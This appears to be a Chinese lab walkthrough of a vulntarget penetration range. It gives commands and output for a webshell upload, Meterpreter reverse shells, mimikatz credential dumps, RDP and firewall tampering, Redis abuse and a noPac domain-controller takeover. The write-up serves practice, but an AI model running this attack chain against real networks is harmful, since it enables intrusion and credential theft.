关注WX:【小白SEC】查看更多内容……
本文仅为学习【vulntarget】,在本地环境测试验证,无其它目的,请勿进行未经授权的测试
一、靶场信息:
下载地址:
百度云:
链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA
提取码:s4ka
**拓扑图:**IP信息根据本地搭建环境自行配置改变
官方WP:vulntarget漏洞靶场系列(一)
二、使用到的工具、漏洞或技术:
工具:
Viper、OA-EXPTOOL、Proxifier、nmap、noPac、RedisEXP、frp
漏洞或技术:
通达OA历史漏洞、Redis未授权漏洞、CVE-2021-42278
三、步骤:
- 通过端口扫描工具,查找靶机IP及端口信息
- 访问发现为通达OA,扫描历史漏洞:
此处使用工具:OA-EXPTOOL
- 此处直接使用工具,获取cookie后利用工具上传WebShell:
- webshell上传成功,使用蚁剑成功连接:
- 开启Viper,建立监听,生成后门程序:
- 将下载的后门程序使用蚁剑上传至win7靶机,并执行:
- 查看Viper,win7已上线:
- 此时已是system权限,无需再提权,使用命令或工具进行路由添加:
自动添加路由命令:
meterpreter > run post/multi/manage/autoroute
[*] Running module against WIN7-PC
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.0.20.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 192.168.0.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Bluetooth vc6.
或者通过viper直接添加路由:
- 使用kiwi获取明文密码信息:
meterpreter > load kiwiLoading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
win7 win7-PC f0d412bd764ffe81aad3b435b51404ee 209c6174da490caeb422f3fa5a7ae634 7c87541fd3f3ef5016e12d411900c87a6046a8e8
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
WIN7-PC$ WORKGROUP (null)
win7 win7-PC admin
tspkg credentials
=================
Username Domain Password
-------- ------ --------
win7 win7-PC admin
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
win7 win7-PC admin
win7-pc$ WORKGROUP (null)
- 开启3389远程登陆:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
- 此处使用Viper对内网网段进行扫描与端口探测:
- 经过扫描发现内网10.0.20.99的80、6379端口开放
- 使用Viper开启socks代理:
- 使用frp搭建socks5代理,具体使用请自行搜索:
- 通过目录扫描发现存在phpinfo页面:
- 通过phpinfo确定绝对路径:
- 尝试使用redis未授权上传webshell:
- 使用蚁剑添加代理,连接webshell:
- Viper开启监听,通过Win7转发上线,进行如下配置:
此处需要通过Win7的session进行转发上线,所以要进行以下配置,直接在msfconsole中也是需要此配置:
msfconsole中配置如下:
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/me
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set LHOST 10.0.20.98
LHOST => 10.0.20.98
msf6 exploit(multi/handler) > set LPORT 1115
LPORT => 1115
msf6 exploit(multi/handler) > set REVERSELISTENERCOMM 1
REVERSELISTENERCOMM => 1
msf6 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.20.98 yes The listen address (an interface may be specified)
LPORT 1115 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 10.0.20.98:1115 via the meterpreter on session 1
- 生成后门程序,通过蚁剑上传到内网的win2016机器,执行:
- 返回Viper查看win2016已上线:
注意:如果未上线,关闭一下win7防火墙
- 对win2016进行提权、账户信息收集、域信息收集等:
提权:此处直接使用 getsystem 可以进行提权,但是其他的环境不一定,后续再说其他提权方式:
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7-PC 192.168.0.103:1111 -> 192.168.0.104:54972 (192.168.0.104)
2 meterpreter x64/windows VULNTARGET\Administrator @ WIN2016 10.0.20.99:1115 -> 10.0.20.99:49947 via session 1 (10.0.20.99)
msf6 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
获取账户信息:此处使用kiwi进行信息收集,获取到明文密码Administrator : Admin@666,对win2016的NTML值进行解密,也可以获取到明文
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1 DPAPI
-------- ------ ---- ---- -----
Administrator VULNTARGET c7c654da31ce51cbeecfef99e637be15 20045722851488e55f32110eb0a5222ba793fe2f 4df31630e621c2278c303c0940d878ff
WIN2016$ VULNTARGET e0cd419213811fd910ca6c3c42d764e7 cd721f807e68ce07a4d0fe80b9356e93986d5ef1
WIN2016$ VULNTARGET 205578b8183da2b5d54f1d52187a2dc4 f453223f7f6a2e82740874f658c1eb267aeb836c
win2016 VULNTARGET dfc8d2bfa540a0a6e2248a82322e654e cfa10f59337120a5ea6882b11c1c9f451f5f4ea6 27bd7cc4802079a6e008ed2d917c4323
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator VULNTARGET (null)
WIN2016$ VULNTARGET (null)
win2016 VULNTARGET (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator VULNTARGET.COM Admin@666
Administrator VULNTARGET.COM (null)
WIN2016$ vulntarget.com NDjm,P3trN$LQ-$cZ9bE<VNzB$JaIR4>T+JNW7Qk?gHpDo(+H>zF^t-gG>,0MmLMBzfZ^ ]/oRL*<>j,WTp+5yF2cA.d%b>^:n/Bmf64:Qx.:/s5Y1">5>wZ
WIN2016$ vulntarget.com 45 1a cd e0 7b ae fd cf 39 33 3a 67 c2 db b4 9e 42 1e 15 2c 24 d3 37 d9 8e 0c 77 9f af e1 3f ae 4b 72 b7 2e 0b fe f6 ad 7a 52 da e1 52 25 43 e6 11 28 6d ff 37 f0 91 54 dc df 75 6b 9c 18 8c 6d 05 83 0d ce 6c 18 c0 87 46 53 f2 d1 fd 46 e7 c1 f9 6f 8b e2 9e 0e 58 6f d2 d7 89 39 29 cc 31 bf 17 bd 38 23 97 be be 14 c6 0a 0f 7a 86 55 05 a6 80 07 dd f2 37 4d 1d c7 5b 69 bf 3b b7 69 6f 75 95 fc 98 fa 74 18 be 65 d3 35 48 eb 64 be 4c 14 69 02 53 55 8d cb 59 6c a0 2d 9b 68 a8 2c 39 c1 63 f5 74 c7 90 86 67 35 06 bc 91 21 96 c0 fa 5c 9b a0 2d 72 8c b9 96 91 ff 09 dd dc ce 71 14 63 12 72 5a 5b eb c8 cc 07 a4 b4 d5 e2 d9 af 21 87 4f 60 3c 88 dc d8 a1 57 14 d7 59 52 d9 67 aa 7f 9a 96 76 56 50 f1 4b 92 a3 56 a3 12 cb 7e 12 7e
win2016 VULNTARGET.COM (null)
win2016$ VULNTARGET.COM (null)
获取域信息:run post/windows/gather/enum_domain
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: vulntarget.com
[+] Domain NetBIOS Name: VULNTARGET
[+] Domain Controller: win2019.vulntarget.com (IP: 10.0.10.110)
- 关闭win2016的防火墙
meterpreter > shell
Process 4680 created.
Channel 1 created.
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。
C:\Windows\system32>netsh Firewall show state
netsh Firewall show state
防火墙状态:
-------------------------------------------------------------------
配置文件 = 标准
操作模式 = 启用
例外模式 = 启用
多播/广播响应模式 = 启用
通知模式 = 禁用
组策略版本 = Windows 防火墙
远程管理模式 = 禁用
所有网络接口上的端口当前均为打开状态:
端口 协议 版本 程序
-------------------------------------------------------------------
80 TCP 任何 (null)
重要信息: 已成功执行命令。
但不赞成使用 "netsh firewall";
而应该使用 "netsh advfirewall firewall"。
有关使用 "netsh advfirewall firewall" 命令
而非 "netsh firewall" 的详细信息,请参阅
http://go.microsoft.com/fwlink/?linkid=121488
上的 KB 文章 947709。
C:\Windows\system32>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
È·¶¨¡£
C:\Windows\system32>
- 官方文档里使用域密码置空进行攻击,此处使用noPac进行攻击:
可以参考之前文章:【域内提权之CVE-2021-42278漏洞复现】
域信息:
**域主机:**VULNTARGET 10.0.10.110
**域名:**vulntarget.com
**域内用户:**win2016 **密码:**Admin#123
- 将所有session都添加路由后开启socks代理
- 使用kali配置socks代理后,使用nopac进行攻击,成功拿下域控主机:
┌──(root)-[/noPac]
└─# proxychains4 python noPac.py -use-ldap vulntarget.com/win2016:'Admin#123' -dc-ip 10.0.10.110 -shell
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[proxychains] Strict chain ... 192.168.0.103:1116 ... 10.0.10.110:389 ... OK
[*] Current ms-DS-MachineAccountQuota = 10
[proxychains] Strict chain ... 192.168.0.103:1116 ... 10.0.10.110:53 ... OK
[*] Selected Target win2019.vulntarget.com
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-UWMIKQB3SXN$"
[*] MachineAccount "WIN-UWMIKQB3SXN$" password = n^u!WN@68kLw
[proxychains] Strict chain ... 192.168.0.103:1116 ... 10.0.10.110:135 ... OK
[proxychains] Strict chain ... 192.168.0.103:1116 ... 10.0.10.110:445 ... OK
[*] Successfully added machine account WIN-UWMIKQB3SXN$ with password n^u!WN@68kLw.
[*] WIN-UWMIKQB3SXN$ object = CN=WIN-UWMIKQB3SXN,CN=Computers,DC=vulntarget,DC=com
[*] WIN-UWMIKQB3SXN$ sAMAccountName == win2019
[proxychains] Strict chain ... 192.168.0.103:1116 ... 10.0.10.110:88 ... OK
[proxychains] Strict chain ... 192.168.0.103:1116 ... 10.0.10.110:88 ... OK
[*] Saving a DC's ticket in win2019.ccache
[*] Reseting the machine account to WIN-UWMIKQB3SXN$
[*] Restored WIN-UWMIKQB3SXN$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[proxychains] Strict chain ... 192.168.0.103:1116 ... 10.0.10.110:88 ... OK
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_win2019.vulntarget.com.ccache
[*] Attempting to del a computer with the name: WIN-UWMIKQB3SXN$
[-] Delete computer WIN-UWMIKQB3SXN$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[proxychains] Strict chain ... 192.168.0.103:1116 ... 10.0.10.110:445 ... OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>ipconfig
Windows IP 配置
以太网适配器 Ethernet0:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::fd46:b12f:5694:3873%4
IPv4 地址 . . . . . . . . . . . . : 10.0.10.110
子网掩码 . . . . . . . . . . . . : 255.255.255.0
默认网关. . . . . . . . . . . . . :
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
- 完整链路图:
靶场WP持续更新……
499
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
